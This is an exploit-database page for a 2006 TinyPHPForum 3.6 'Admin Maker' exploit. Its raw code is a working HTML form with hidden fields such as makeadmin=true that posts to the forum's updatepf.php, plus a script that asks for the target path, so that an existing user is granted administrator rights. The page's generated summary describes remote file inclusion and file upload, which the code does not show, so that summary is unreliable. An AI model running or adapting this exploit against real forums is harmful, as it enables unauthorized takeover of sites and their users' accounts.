header-logo
Suggest Exploit
vendor:
TinyPHPForum 3.6
by:
SirDarckCat
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: TinyPHPForum 3.6
Affected Version From: 3.6
Affected Version To: 3.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

TinyPHPForum 3.6 Admin Maker

This exploit allows an attacker to inject malicious code into a vulnerable web application. By exploiting a vulnerability in TinyPHPForum 3.6, an attacker can upload a malicious file to the server and execute it. The vulnerability exists due to the application not properly validating user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application. This will allow the attacker to upload a malicious file to the server and execute it.

Mitigation:

The application should validate user-supplied input to prevent malicious code from being uploaded to the server.
Source

Exploit-DB raw data:

TinyPHPForum 3.6 Admin Maker<br>
By SirDarckCat from elhacker.net

<FORM method=post enctype="multipart/form-data">
Existing User:<INPUT name=uname><br>
<INPUT type=file name=userfile style="visibility:HIDDEN"><br>
<INPUT type=hidden name=email value="a@b.c">
<input type=hidden name=makeadmin value=true>
<input type=hidden name=stat value=true>
<input type=hidden name=ulang value=en>
<input type=hidden name=uskin value=default>
<INPUT type=submit>
</FORM>

<script language="JavaScript">
document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php";
</script>

# milw0rm.com [2006-08-02]

Navigation

Suggest Exploit

Services By CQR